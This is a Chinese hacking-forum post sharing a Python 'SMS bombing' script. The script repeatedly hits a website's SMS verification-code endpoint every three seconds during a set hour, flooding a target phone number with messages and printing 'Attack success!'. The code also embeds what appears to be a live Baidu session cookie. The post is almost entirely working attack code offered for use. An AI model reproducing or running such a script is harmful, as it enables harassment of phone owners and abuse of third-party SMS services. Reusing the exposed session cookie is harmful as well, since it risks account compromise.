找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3368|回复: 0
打印 上一主题 下一主题

[其它] Python版短信轰炸定时攻击版

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:33:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  1. #!/usr/bin/python
  2. #coding=utf-8
  3. import os
  4. import datetime
  5. import time
  6. import requests
  7. def main():
  8.     while True:
  9.         now = datetime.datetime.now()
  10.         xiaoshi = now.hour
  11.         fenzhong = now.minute
  12.         xhour = 10
  13.         yhour = 11
  14.         #xminute = 10
  15.         #yminute = 58
  16.         # print(xiaoshi,fenzhong,type(xiaoshi),type(fenzhong))
  17.         #while xminute <= fenzhong <= yminute:
  18.         while xhour <= xiaoshi <= yhour:   

  19.    
  20.                         headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0',
  21.                                    'Cookie': 'BIDUPSID=A42CA66BAABF2D1B7D862DDBEF8DE632; PSTM=1509949825; BAIDUID=A42CA66BAABF2D1B7D862DDBEF8DE632:SL=0:NR=50:FG=1; __cfduid=d93b9bd190e946b73984e3d60125705501513672771; BDUSS=2tObm40NGh5cDVlQmpiMURkbHg3OVU5S1JjMUd2WVVjQ1pCeFlCdS02ckpTUzliQVFBQUFBJCQAAAAAAAAAAAEAAAAefHgBcWlueGlhb3Blbmc0NTYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMm8B1vJvAdbS; MCITY=-327%3A; BDSFRCVID=4l4sJeC624Ihykn7hEqTJCqhEmK2PerTH6ao4J2X6nnzzDda9KrQEG0Pqx8g0Ku-jY-KogKKyeOTHu3P; H_BDCLCKID_SF=tJA8_DP2tI83fP36q6LaejvH-UIstJJC-2Q-5KL-bxJEbh0RjIcJ2xKpLpQ304riJI8q-UbdJJjoSDbbXlrYyMLJKh7TLqjKMeTxoUJ_5DnJhhvG-x42bbLebPRih4Q9QgbtoMtLtC0BMItCDju3-PAt-U4X5470M6TXsJOOaCk2OpbRy4oTj6DdhUobqTtfHmoxWpcn-RnpDqkCytOG3MvB-fn-QqcILIAHbhQLtJOfHJvsQft20M0EeMtjBbQaQeKHsR7jWhvBeq72yb_505TLjNufJTKDfR32WnTJ25rHDbTw5tI_-P4DenJqBRJZ5mAqoqOO5R-WhI0zXlQhyxtLM-oLB55A5N6naIQqWR5CofjM-T56QRTX-UOKaM743bRTKnLy5KJvfJoKyjKVhP-Uypr-Wh37bR7TVD_ytI_bMDDr5nJbqRkthxT--I62aKDsBt8y-hcqEIL4WRbD-xKpjgcwt63Z0563KR6DLJbfDxbSj4QoqjLD0hOCtpcGKGvkVR5pJh5nhMJeb67JDMP0qf6kexny523iXR5vQpnhhUtuDjAhejO0DHusKP6e-IObsJOsa-5fK4bNh4bqhR3H-UnLqM3CbT7Z0l8Ktt38SRjLh6tV0bOXy4bDaUQL2ItJLUomWIQHDnnFyPvnqfK05UID-JTJLKo4KKJx3nLWeIJo5t5ojPnQhUJiBbc-Ban7LCOxfD_WhK_6jjL35n-Wql702t6-bPo2WbCQ3xbUqpcNLUbWQTtF5n6at-Dj2Tc7hUJOBlTisInMqJ5t0MANDPCEJjkjtJktoCv5b-0_JbTkh4oMq4tehH4J2T3eWDTm_D_2WRnBjnu6MMoa3MIdKf742xPHLITH-pPKKRAMOCoyj4T_2RIvbML8BbjI3mkjbPjyfn02OPKzMluVyP4syPR8KxRnWTIebIcJ-J8XhDDxj6oP; PSINO=1; H_PS_PSSID=; BDORZ=FFFB88E999055A3F8A630C64834BD6D0; Hm_lvt_c37ef181e05da9d936de2ed835125647=1531294843; Hm_lpvt_c37ef181e05da9d936de2ed835125647=1531295181', 'Referer': 'http://9kb.org/apply'}

  22.                         payload = {'m1': '1329', 'm2': '9999999'}
  23.                         r = requests.get(' http://9kb.org/doctor/ajax/sendsmscode',params=payload,headers=headers)
  24.                         time.sleep(3)
  25.                         #i +=1
  26.                         #print(r.url)
  27.                         ww=datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
  28.                        
  29.                         print('Attack success!Good luck!',ww)
  30.                        
  31.                         break
  32. if __name__ == '__main__':
  33.     main()
复制代码
程序的主要流程是从10开始攻击到11点,每3秒攻击一次
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表